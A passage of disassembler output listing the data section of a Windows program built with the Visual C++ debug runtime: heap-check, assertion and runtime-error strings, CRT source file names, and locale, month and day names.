; DATA XREF: sub_41CA80+17F�o
; sub_41D1D0+208�o
align 4
a_block_type_is db '_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)',0 ; DATA XREF: sub_41CA80+10A�o
; sub_41CE90+E2�o ...
align 4
aClientHookFree db 'Client hook free failure.',0Ah,0 ; DATA XREF: sub_41CA80:loc_41CAED�o
align 4
dword_43C928 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CE90+5�o
dd offset sub_41D001
align 8
dword_43C938 dd 0FFFFFFFFh, 0 ; DATA XREF: _0:0041D045�o
dd offset sub_41D0FD
aMemoryCheckErr db 'memory check error at 0x%08X = 0x%02X, should be 0x%02X.',0Ah,0
; DATA XREF: sub_41D140+54�o
align 10h
aHsLocatedAt0x0 db '%hs located at 0x%08X is %u bytes long.',0Ah,0
; DATA XREF: sub_41D1D0+33A�o
align 4
aHsAllocatedAtF db '%hs allocated at file %hs(%d).',0Ah,0 ; DATA XREF: sub_41D1D0+307�o
aDamageOnTopOfF db 'DAMAGE: on top of Free block at 0x%08X.',0Ah,0
; DATA XREF: sub_41D1D0+2BE�o
align 4
aDamaged db 'DAMAGED',0 ; DATA XREF: sub_41D1D0:loc_41D3A4�o
a_heapchkFail_3 db '_heapchk fails with unknown return value!',0Ah,0
; DATA XREF: sub_41D1D0:loc_41D2FC�o
align 4
a_heapchkFail_2 db '_heapchk fails with _HEAPBADPTR.',0Ah,0
; DATA XREF: sub_41D1D0:loc_41D2D4�o
align 10h
a_heapchkFail_1 db '_heapchk fails with _HEAPBADEND.',0Ah,0
; DATA XREF: sub_41D1D0:loc_41D2AC�o
align 4
a_heapchkFail_0 db '_heapchk fails with _HEAPBADNODE.',0Ah,0
; DATA XREF: sub_41D1D0:loc_41D284�o
align 4
a_heapchkFailsW db '_heapchk fails with _HEAPBADBEGIN.',0Ah,0
; DATA XREF: sub_41D1D0:loc_41D259�o
align 10h
dword_43CAC0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D1D0+5�o
dd offset sub_41D545
align 10h
dword_43CAD0 dd 0FFFFFFFFh, 0 ; DATA XREF: _0:0041D5B5�o
dd offset sub_41D63D
align 10h
dword_43CAE0 dd 0FFFFFFFFh, 0 ; DATA XREF: _0:0041D7E5�o
dd offset sub_41D8E6
aBadMemoryBlock db 'Bad memory block found at 0x%08X.',0Ah,0 ; DATA XREF: sub_41D930+13C�o
align 10h
a_crtmemcheckpo db '_CrtMemCheckPoint: NULL state pointer.',0Ah,0
; DATA XREF: sub_41D930:loc_41D959�o
dword_43CB38 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D930+5�o
dd offset sub_41DAB8
a_crtmemdiffere db '_CrtMemDifference: NULL state pointer.',0Ah,0
; DATA XREF: _0:loc_41DB02�o
aObjectDumpComp db 'Object dump complete.',0Ah,0 ; DATA XREF: sub_41DC10:loc_41DECC�o
align 4
aCrtBlockAt0x08 db 'crt block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: sub_41DC10+271�o
align 4
aNormalBlockAt0 db 'normal block at 0x%08X, %u bytes long.',0Ah,0
; DATA XREF: sub_41DC10+214�o
aClientBlockAt0 db 'client block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: sub_41DC10+1A9�o
aLd db '{%ld} ',0 ; DATA XREF: sub_41DC10+15A�o
align 4
aHsD db '%hs(%d) : ',0 ; DATA XREF: sub_41DC10+132�o
align 4
aFileErrorD db '#File Error#(%d) : ',0 ; DATA XREF: sub_41DC10+101�o
aDumpingObjects db 'Dumping objects ->',0Ah,0 ; DATA XREF: sub_41DC10:loc_41DC4B�o
dword_43CC50 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DC10+5�o
dd offset sub_41DEC1
aDataSS db ' Data: <%s> %s',0Ah,0 ; DATA XREF: sub_41DF10+EC�o
a_2x db '%.2X ',0 ; DATA XREF: sub_41DF10+BF�o
align 4
aDetectedMemory db 'Detected memory leaks!',0Ah,0 ; DATA XREF: sub_41E030:loc_41E064�o
aTotalAllocatio db 'Total allocations: %ld bytes.',0Ah,0 ; DATA XREF: _0:0041E14D�o
align 4
aLargestNumberU db 'Largest number used: %ld bytes.',0Ah,0 ; DATA XREF: _0:0041E125�o
align 10h
aLdBytesInLdHsB db '%ld bytes in %ld %hs Blocks.',0Ah,0 ; DATA XREF: _0:0041E0FB�o
align 10h
aMode_t0 db '*mode != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_41E390+95�o
align 4
aModeNull db 'mode != NULL',0 ; DATA XREF: sub_41E390+67�o
; sub_4277D0+4F�o
align 4
aFile_t0 db '*file != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_41E390+3D�o
align 4
aFopen_c db 'fopen.c',0 ; DATA XREF: sub_41E390+18�o
; sub_41E390+46�o ...
aFileNull db 'file != NULL',0 ; DATA XREF: sub_41E390+F�o
align 10h
aFormatNull db 'format != NULL',0 ; DATA XREF: sub_41EA60+45�o
; sub_41EC30+45�o ...
align 10h
aSprintf_c db 'sprintf.c',0 ; DATA XREF: sub_41EA60+24�o
; sub_41EA60+4E�o ...
align 4
aStringNull db 'string != NULL',0 ; DATA XREF: sub_41EA60+1B�o
; sub_41EC30+1B�o ...
align 4
aFgets_c db 'fgets.c',0 ; DATA XREF: sub_41EFB0+24�o
; sub_41EFB0+4E�o
aFprintf_c db 'fprintf.c',0 ; DATA XREF: sub_41F4E0+1E�o
; sub_41F4E0+48�o
align 10h
aVsprintf_c db 'vsprintf.c',0 ; DATA XREF: sub_41F9C0+1E�o
; sub_41F9C0+48�o
align 4
aSscanf_c db 'sscanf.c',0 ; DATA XREF: sub_41FF30+24�o
; sub_41FF30+4E�o
align 4
dbl_43CD98 dq 1.0 ; DATA XREF: sub_41FFF0+99�r
; sub_420210+99�r ...
dword_43CDA0 dd 64676264h, 632E6C65h, 7070h ; DATA XREF: sub_420B80+62�o
dword_43CDAC dd 78656E6Fh, 632E7469h, 0 ; DATA XREF: sub_420C50+2E�o
; sub_420D30+8�o
dword_43CDB8 dd 65657366h, 632E6Bh ; DATA XREF: sub_420FE0+16�o
; sub_421050+19�o
dword_43CDC0 dd 75727473h, 632E7270h, 0 ; DATA XREF: sub_421620+133�o
dword_43CDCC dd 7473626Dh, 7363776Fh, 632Eh ; DATA XREF: sub_421F10+32�o
dword_43CDD8 dd 3D212073h, 4C554E20h, 4Ch, 0 ; DATA XREF: sub_421F10+29�o
dword_43CDE8 dd 0FFFFFFFFh, 422232h, 42224Dh ; DATA XREF: _0:00422105�o
dword_43CDF4 dd 6C69665Fh, 632E65h, 65737341h, 6F697472h, 6146206Eh
; DATA XREF: sub_4222D0+31�o
; sub_4222D0+65�o ...
dd 64656C69h, 0
aError db 'Error',0 ; DATA XREF: _2:00451AE8�o
align 4
aWarning db 'Warning',0 ; DATA XREF: _2:off_451AE4�o
aSDS db '%s(%d) : %s',0 ; DATA XREF: sub_422610+1FF�o
asc_43CE2C: ; DATA XREF: sub_422610:loc_4227E6�o
dw 0Ah
unicode 0, <>,0
asc_43CE30: ; DATA XREF: sub_422610+1C2�o
dw 0Dh
unicode 0, <>,0
aAssertionFai_0 db 'Assertion failed!',0 ; DATA XREF: sub_422610:loc_422785�o
align 4
aAssertionFaile db 'Assertion failed: ',0 ; DATA XREF: sub_422610+169�o
align 4
a_crtdbgreportS db '_CrtDbgReport: String too long or IO Error',0
; DATA XREF: sub_422610+149�o
; sub_422610+21C�o ...
align 4
aSecondChanceAs db 'Second Chance Assertion Failed: File %s, Line %d',0Ah,0
; DATA XREF: sub_422610+E6�o
align 4
aWsprintfa db 'wsprintfA',0 ; DATA XREF: sub_422610+B6�o
align 4
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_422610+9C�o
; sub_430AA0+16�o
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Debug Library',0 ; DATA XREF: sub_4229A0+2C2�o
align 4
aDebugSProgramS db 'Debug %s!',0Ah ; DATA XREF: sub_4229A0+28C�o
db 0Ah
db 'Program: %s%s%s%s%s%s%s%s%s%s%s',0Ah
db 0Ah
db '(Press Retry to debug the application)',0
align 4
aModule db 0Ah ; DATA XREF: sub_4229A0+221�o
db 'Module: ',0
align 4
aFile_1 db 0Ah ; DATA XREF: sub_4229A0+1E1�o
db 'File: ',0
aLine db 0Ah ; DATA XREF: sub_4229A0+1AA�o
db 'Line: ',0
asc_43CF68 db 0Ah ; DATA XREF: sub_4229A0+173�o
; sub_42FF30+171�o
db 0Ah,0
align 4
aExpression db 'Expression: ',0 ; DATA XREF: sub_4229A0+153�o
align 4
dword_43CF7C dd 0 ; DATA XREF: sub_4229A0:loc_422ABA�o
; sub_4229A0:loc_422AD9�o ...
aForInformation db 0Ah ; DATA XREF: sub_4229A0+10E�o
db 0Ah
db 'For information on how your program can cause an assertion',0Ah
db 'failure, see the Visual C++ documentation on asserts.',0
align 4
a___ db '...',0 ; DATA XREF: sub_4229A0+9C�o
; sub_4229A0+F4�o ...
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4229A0+56�o
; sub_42FF30+ED�o
align 10h
aDbgrpt_c db 'dbgrpt.c',0 ; DATA XREF: sub_4229A0+1F�o
align 4
aSzusermessageN db 'szUserMessage != NULL',0 ; DATA XREF: sub_4229A0+13�o
align 4
a_freebuf_c db '_freebuf.c',0 ; DATA XREF: sub_422DE0+15�o
align 10h
aMlock_c db 'mlock.c',0 ; DATA XREF: sub_423280+16�o
dword_43D048 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4234C0+5�o
dd offset sub_423525
dd 0FFFFFFFFh, 0
dd offset sub_4235A7
dword_43D060 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423620+5�o
dd offset sub_4236C1
dd 0FFFFFFFFh, 0
dd offset sub_4237BA
dword_43D078 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423830+5�o
dd offset sub_4239F8
dd 0FFFFFFFFh, 0
dd offset sub_423C0F
dword_43D090 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423CD0+5�o
dd offset sub_423D4B
dd 0FFFFFFFFh, 0
dd offset sub_423DCD
dword_43D0A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423E20+5�o
dd offset sub_423E82
dd 0FFFFFFFFh, 0
dd offset sub_423EC7
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_426C90+B9�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_426C90+5A�o
align 10h
a_filbuf_c db '_filbuf.c',0 ; DATA XREF: sub_427100+18�o
align 4
a_open_c db '_open.c',0 ; DATA XREF: sub_4277D0+2E�o
; sub_4277D0+58�o ...
aFilenameNull db 'filename != NULL',0 ; DATA XREF: sub_4277D0+25�o
align 4
aStream_c db 'stream.c',0 ; DATA XREF: sub_427B60+C1�o
align 4
aInconsistentIo db '("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)',0
; DATA XREF: sub_427CE0+162�o
align 4
a_flsbuf_c db '_flsbuf.c',0 ; DATA XREF: sub_427CE0+18�o
; sub_427CE0+16E�o
align 10h
byte_43D170 db 6 ; DATA XREF: sub_427F60+8F�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: _2:off_453E00�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: _2:off_453DFC�o
align 4
aOutput_c db 'output.c',0 ; DATA XREF: sub_427F60+122�o
align 10h
aCh_t0 db 'ch != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_427F60+116�o
align 10h
aTidtable_c db 'tidtable.c',0 ; DATA XREF: sub_428E00+23�o
; sub_428EE0+29�o
align 4
a_sftbuf_c db '_sftbuf.c',0 ; DATA XREF: sub_429C90+18�o
; sub_429C90+B2�o ...
align 4
aFlag0Flag1 db 'flag == 0 || flag == 1',0 ; DATA XREF: sub_429DF0+13�o
align 10h
aInput_c db 'input.c',0 ; DATA XREF: sub_429E90+1E�o
; sub_429E90+4B�o
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aLog_0 db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: _2:off_45407C�o
align 10h
dbl_43D2F0 dq 0.0 ; DATA XREF: sub_42BAE0+D7�r
; sub_42BAE0+11A�r ...
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_42C430+1A�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_42C430+6�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_42C710:loc_42C788�o
align 4
dword_43D328 dd 0FFFFFFFFh, 42D1B9h, 42D1C6h, 0 ; DATA XREF: sub_42D120+5�o
dword_43D338 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42D310+5�o
dd offset sub_42D3ED
align 8
dd offset loc_42D3AE
dd offset loc_42D3BB
dword_43D350 dd 0FFFFFFFFh, 42D70Ch, 42D712h, 0 ; DATA XREF: sub_42D4B0+5�o
dword_43D360 dd 0FFFFFFFFh, 42D78Eh, 42D79Dh, 0 ; DATA XREF: sub_42D730+5�o
dword_43D370 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42D860+5�o
dd offset sub_42D8CE
align 10h
dd offset loc_42D8B0
dd offset loc_42D8B6
dword_43D388 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42D910+5�o
dd offset sub_42D97A
align 8
dd offset loc_42D95C
dd offset loc_42D962
aLc_time db 'LC_TIME',0 ; DATA XREF: _2:004542FC�o
aLc_numeric db 'LC_NUMERIC',0 ; DATA XREF: _2:004542F0�o
align 4
aLc_monetary db 'LC_MONETARY',0 ; DATA XREF: _2:004542E4�o
aLc_ctype db 'LC_CTYPE',0 ; DATA XREF: _2:004542D8�o
align 4
aLc_collate db 'LC_COLLATE',0 ; DATA XREF: _2:004542CC�o
align 4
aLc_all db 'LC_ALL',0 ; DATA XREF: _2:off_4542C0�o
align 10h
asc_43D3E0: ; DATA XREF: _0:loc_42DC43�o
; sub_42E020+83�o
unicode 0, <;>,0
asc_43D3E4 db '=;',0 ; DATA XREF: _0:loc_42DB71�o
align 4
aSetlocal_c db 'setlocal.c',0 ; DATA XREF: sub_42DE80+3E�o
; sub_42E020+1B�o
align 4
asc_43D3F4: ; DATA XREF: sub_42E020+5B�o
unicode 0, <=>,0
a___0 db '_.,',0 ; DATA XREF: sub_42E310:loc_42E382�o
a__4: ; DATA XREF: sub_42E470+50�o
; sub_4342F0:loc_4344EB�o
unicode 0, <.>,0
a__5: ; DATA XREF: sub_42E470+25�o
unicode 0, <_>,0
aFtell_c db 'ftell.c',0 ; DATA XREF: _0:0042E646�o
; sub_42E6A0+18�o
dword_43D40C dd 0 ; DATA XREF: sub_42EC50+5D�o
; sub_431210+58�o ...
dword_43D410 dd 2 dup(0) ; DATA XREF: sub_42EC50+35�o
; sub_431210+35�o ...
dword_43D418 dd 0FFFFFFFFh, 42ED96h, 42ED9Ch, 0FFFFFFFFh, 42EE8Ch, 42EE92h
; DATA XREF: sub_42EC50+5�o
dword_43D430 dd 65647473h, 2E70766Eh, 63h ; DATA XREF: sub_42F290+5B�o
; sub_42F290+D0�o
dword_43D43C dd 61647473h, 2E766772h, 63h ; DATA XREF: sub_42F3E0+72�o
dword_43D448 dd 6E655F61h, 632E76h ; DATA XREF: sub_42F8F0+E8�o
; sub_42F8F0+1C6�o
dword_43D450 dd 6E696F69h, 632E7469h, 0 ; DATA XREF: sub_42FB10+B�o
; sub_42FB10+106�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 0A0Dh, 534F4C54h
dd 72652053h, 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh
dd 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: _2:off_4543BC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVis_0 db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_42FF30+1A4�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_42FF30:loc_43007A�o
db 0Ah
db 'Program: ',0
align 4
aWinsig_c db 'winsig.c',0 ; DATA XREF: _0:00430651�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_430AA0+5F�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_430AA0:loc_430AEB�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_430AA0+2A�o
aOsfinfo_c db 'osfinfo.c',0 ; DATA XREF: sub_430B60+138�o
align 8
dword_43D778 dd 0FFFFFFFFh, 431354h, 43135Ah ; DATA XREF: sub_431210+5�o
dword_43D784 dd 7465675Fh, 2E667562h, 63h ; DATA XREF: sub_4313D0+16�o
; sub_4313D0+48�o
dword_43D790 dd 6F74626Dh, 632E6377h, 0 ; DATA XREF: sub_431C20+21�o
aMb_cur_max1Mb_ db 'MB_CUR_MAX == 1 || MB_CUR_MAX == 2',0 ; DATA XREF: sub_431C20+18�o
align 10h
aUngetc_c db 'ungetc.c',0 ; DATA XREF: _0:00431DB6�o
; sub_431E10+16�o
align 4
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTzset_c db 'tzset.c',0 ; DATA XREF: sub_433090+1D1�o
aTz db 'TZ',0 ; DATA XREF: sub_433090+35�o
align 4
aInittime_c db 'inittime.c',0 ; DATA XREF: sub_433970+13�o
align 4
aInitnum_c db 'initnum.c',0 ; DATA XREF: sub_4342F0+1CF�o
; sub_4342F0+215�o ...
align 10h
aInitmon_c db 'initmon.c',0 ; DATA XREF: sub_434620+13�o
align 4
aInitctyp_c db 'initctyp.c',0 ; DATA XREF: sub_434A80+52�o
; sub_434A80+6B�o ...
align 4
aParaguay db 'Paraguay',0
align 4
aUruguay db 'Uruguay',0
aChile db 'Chile',0 ; DATA XREF: _2:004549E4�o
align 4
aEcuador db 'Ecuador',0 ; DATA XREF: _2:004549B8�o
aArgentina db 'Argentina',0
align 4
aPeru db 'Peru',0
align 10h
aColombia db 'Colombia',0 ; DATA XREF: _2:00454934�o
align 4
aVenezuela db 'Venezuela',0
align 4
aDominicanRepub db 'Dominican Republic',0 ; DATA XREF: _2:004548DC�o
align 4
aSouthAfrica db 'South Africa',0
align 4
aPanama db 'Panama',0 ; DATA XREF: _2:00454884�o
align 4
aLuxembourg db 'Luxembourg',0 ; DATA XREF: _2:00454858�o
align 10h
aCostaRica db 'Costa Rica',0 ; DATA XREF: _2:0045482C�o
align 4
aSwitzerland db 'Switzerland',0
aGuatemala db 'Guatemala',0 ; DATA XREF: _2:004547D4�o
align 4
aCanada db 'Canada',0 ; DATA XREF: _2:004547A8�o
align 4
aSpanishModernS db 'Spanish - Modern Sort',0 ; DATA XREF: _2:00454774�o
align 4
aAustralia db 'Australia',0 ; DATA XREF: _2:00454750�o
align 10h
aEnglish db 'English',0 ; DATA XREF: _2:00454748�o _2:004548A8�o
aAustria db 'Austria',0 ; DATA XREF: _2:00454724�o
aGerman db 'German',0 ; DATA XREF: _2:0045471C�o
align 4
aBelgium db 'Belgium',0 ; DATA XREF: _2:004546F8�o
aMexico db 'Mexico',0 ; DATA XREF: _2:004546CC�o
align 4
aSpanish db 'Spanish',0 ; DATA XREF: _2:004546C4�o _2:004547CC�o ...
aBasque db 'Basque',0 ; DATA XREF: _2:00454698�o
align 4
aSweden db 'Sweden',0 ; DATA XREF: _2:00454674�o
align 10h
aSwedish db 'Swedish',0 ; DATA XREF: _2:0045466C�o
aIceland db 'Iceland',0 ; DATA XREF: _2:00454648�o
aIcelandic db 'Icelandic',0 ; DATA XREF: _2:00454640�o
align 4
aFrance db 'France',0 ; DATA XREF: _2:0045461C�o
align 4
aFrench db 'French',0 ; DATA XREF: _2:00454614�o _2:004546F0�o ...
align 4
aFinland db 'Finland',0 ; DATA XREF: _2:004545F0�o
aFinnish db 'Finnish',0 ; DATA XREF: _2:004545E8�o
aSpain db 'Spain',0 ; DATA XREF: _2:off_4545C4�o
; _2:004546A0�o ...
align 4
aSpanishTraditi db 'Spanish - Traditional Sort',0 ; DATA XREF: _2:off_4545BC�o
align 10h
aUnitedStates db 'united-states',0
align 10h
aUnitedKingdom db 'united-kingdom',0
align 10h
aTrinidadTobago db 'trinidad & tobago',0
align 4
aSouthKorea db 'south-korea',0
aSouthAfrica_0 db 'south-africa',0
align 10h
aSouthKorea_0 db 'south korea',0
aSouthAfrica_1 db 'south africa',0
align 4
aSlovak db 'slovak',0
align 4
aPuertoRico db 'puerto-rico',0
aPrChina db 'pr-china',0
align 4
aPrChina_0 db 'pr china',0
align 4
aNz db 'nz',0
align 4
aNewZealand db 'new-zealand',0
aHongKong db 'hong-kong',0
align 4
aHolland db 'holland',0
aGreatBritain db 'great britain',0
align 4
aEngland db 'england',0
aCzech db 'czech',0
align 4
aChina db 'china',0
align 4
aBritain db 'britain',0 ; DATA XREF: _2:00454A70�o
aAmerica db 'america',0 ; DATA XREF: _2:off_454A68�o
aUsa db 'usa',0
aUs db 'us',0
align 4
aUk db 'uk',0
align 10h
aSwiss db 'swiss',0
align 4
aSwedishFinland db 'swedish-finland',0
aSpanishVenezue db 'spanish-venezuela',0
align 4
aSpanishUruguay db 'spanish-uruguay',0
aSpanishPuertoR db 'spanish-puerto rico',0
aSpanishPeru db 'spanish-peru',0
align 10h
aSpanishParagua db 'spanish-paraguay',0
align 4
aSpanishPanama db 'spanish-panama',0
align 4
aSpanishNicarag db 'spanish-nicaragua',0
align 4
aSpanishModern db 'spanish-modern',0
align 4
aSpanishMexican db 'spanish-mexican',0
aSpanishHondura db 'spanish-honduras',0
align 4
aSpanishGuatema db 'spanish-guatemala',0
align 10h
aSpanishElSalva db 'spanish-el salvador',0
aSpanishEcuador db 'spanish-ecuador',0
aSpanishDominic db 'spanish-dominican republic',0
align 10h
aSpanishCostaRi db 'spanish-costa rica',0
align 4
aSpanishColombi db 'spanish-colombia',0
align 4
aSpanishChile db 'spanish-chile',0
align 4
aSpanishBolivia db 'spanish-bolivia',0
aSpanishArgenti db 'spanish-argentina',0
align 4
aPortugueseBraz db 'portuguese-brazilian',0
align 4
aNorwegianNynor db 'norwegian-nynorsk',0
align 4
aNorwegianBokma db 'norwegian-bokmal',0
align 4
aNorwegian db 'norwegian',0
align 4
aItalianSwiss db 'italian-swiss',0
align 4
aIrishEnglish db 'irish-english',0
align 4
aGermanSwiss db 'german-swiss',0
align 4
aGermanLuxembou db 'german-luxembourg',0
align 4
aGermanLichtens db 'german-lichtenstein',0
aGermanAustrian db 'german-austrian',0
aFrenchSwiss db 'french-swiss',0
align 10h
aFrenchLuxembou db 'french-luxembourg',0
align 4
aFrenchCanadian db 'french-canadian',0
aFrenchBelgian db 'french-belgian',0
align 4
aEnglishUsa db 'english-usa',0
aEnglishUs db 'english-us',0
align 4
aEnglishUk db 'english-uk',0
align 4
aEnglishTrinida db 'english-trinidad y tobago',0
align 4
aEnglishSouthAf db 'english-south africa',0
align 4
aEnglishNz db 'english-nz',0
align 4
aEnglishJamaica db 'english-jamaica',0
aEnglishIre db 'english-ire',0
aEnglishCaribbe db 'english-caribbean',0
align 4
aEnglishCan db 'english-can',0
aEnglishBelize db 'english-belize',0
align 4
aEnglishAus db 'english-aus',0
aEnglishAmerica db 'english-american',0
align 4
aDutchBelgian db 'dutch-belgian',0
align 4
aChineseTraditi db 'chinese-traditional',0
aChineseSingapo db 'chinese-singapore',0
align 4
aChineseSimplif db 'chinese-simplified',0
align 10h
aChineseHongkon db 'chinese-hongkong',0
align 4
aChinese db 'chinese',0
aChi db 'chi',0
aChh db 'chh',0
aCanadian db 'canadian',0
align 10h
aBelgian db 'belgian',0
aAustralian db 'australian',0
align 4
aAmericanEnglis db 'american-english',0
align 4
aAmericanEngl_0 db 'american english',0
align 4
aAmerican db 'american',0 ; DATA XREF: _2:off_454B20�o
align 4
off_43DEC8 dd offset byte_50434F ; DATA XREF: sub_435800:loc_435853�o
off_43DECC dd offset byte_504341 ; DATA XREF: sub_435800+16�o
dword_43DED0 dd 69736863h, 632E657Ah, 0 ; DATA XREF: sub_435EC0+38�o
dword_43DEDC dd 657A6973h, 203D3E20h, 30h ; DATA XREF: sub_435EC0+2C�o
dword_43DEE8 dd 4E512331h, 4E41h ; DATA XREF: sub_436F70:loc_43712F�o
dword_43DEF0 dd 4E492331h, 46h ; DATA XREF: sub_436F70+19B�o
dword_43DEF8 dd 4E492331h, 44h ; DATA XREF: sub_436F70+168�o
dword_43DF00 dd 4E532331h, 4E41h, 6D6D3A48h, 73733Ah, 64646464h, 4D4D202Ch
; DATA XREF: sub_436F70+125�o
dd 64204D4Dh, 79202C64h, 797979h, 2F642F4Dh, 7979h, 4D50h
dd 4D41h, 65636544h, 7265626Dh, 0
aNovember db 'November',0
align 4
aOctober db 'October',0
aSeptember db 'September',0
align 10h
aAugust db 'August',0
align 4
aJuly db 'July',0
align 10h
aJune db 'June',0
align 4
aApril db 'April',0
align 10h
aMarch db 'March',0
align 4
aFebruary db 'February',0
align 4
aJanuary db 'January',0
aDec db 'Dec',0
aNov db 'Nov',0
aOct db 'Oct',0
aSep db 'Sep',0
aAug db 'Aug',0
aJul db 'Jul',0
aJun db 'Jun',0
aMay db 'May',0 ; DATA XREF: _2:00454D78�o
aApr db 'Apr',0 ; DATA XREF: _2:00454D74�o
aMar db 'Mar',0 ; DATA XREF: _2:00454D70�o
aFeb db 'Feb',0 ; DATA XREF: _2:00454D6C�o
aJan db 'Jan',0 ; DATA XREF: _2:00454D68�o
aSaturday db 'Saturday',0 ; DATA XREF: _2:00454D64�o
align 4
aFriday db 'Friday',0 ; DATA XREF: _2:00454D60�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: _2:00454D5C�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: _2:00454D58�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: _2:00454D54�o
aMonday db 'Monday',0 ; DATA XREF: _2:00454D50�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: _2:00454D4C�o
align 10h
aSat db 'Sat',0 ; DATA XREF: _2:00454D48�o
aFri db 'Fri',0 ; DATA XREF: _2:00454D44�o
aThu db 'Thu',0 ; DATA XREF: _2:00454D40�o
aWed db 'Wed',0 ; DATA XREF: _2:00454D3C�o
aTue db 'Tue',0 ; DATA XREF: _2:00454D38�o
aMon db 'Mon',0 ; DATA XREF: _2:00454D34�o
aSun db 'Sun',0 ; DATA XREF: _2:off_454D30�o
aAP db 'a/p',0 ; DATA XREF: sub_4384E0:loc_4386D3�o
aAmPm db 'am/pm',0 ; DATA XREF: sub_4384E0:loc_4386B3�o
align 4
aInithelp_c db 'inithelp.c',0 ; DATA XREF: sub_438A00+9C�o
; sub_438A00+F1�o
align 8
dword_43E048 dd 0FFFFFFFFh, 438DC7h, 438DCDh, 0FFFFFFFFh, 438E46h, 438E4Ch
; DATA XREF: sub_438CA0+5�o
dword_43E060 dd 6D6F7477h, 766E6562h, 632Eh, 0 ; DATA XREF: sub_4396D0+44�o
dword_43E070 dd 0FFFFFFFFh, 43987Dh, 439883h, 0 ; DATA XREF: sub_439780+5�o
dword_43E080 dd 0FFFFFFFFh, 439A1Fh, 439A25h ; DATA XREF: sub_439920+5�o
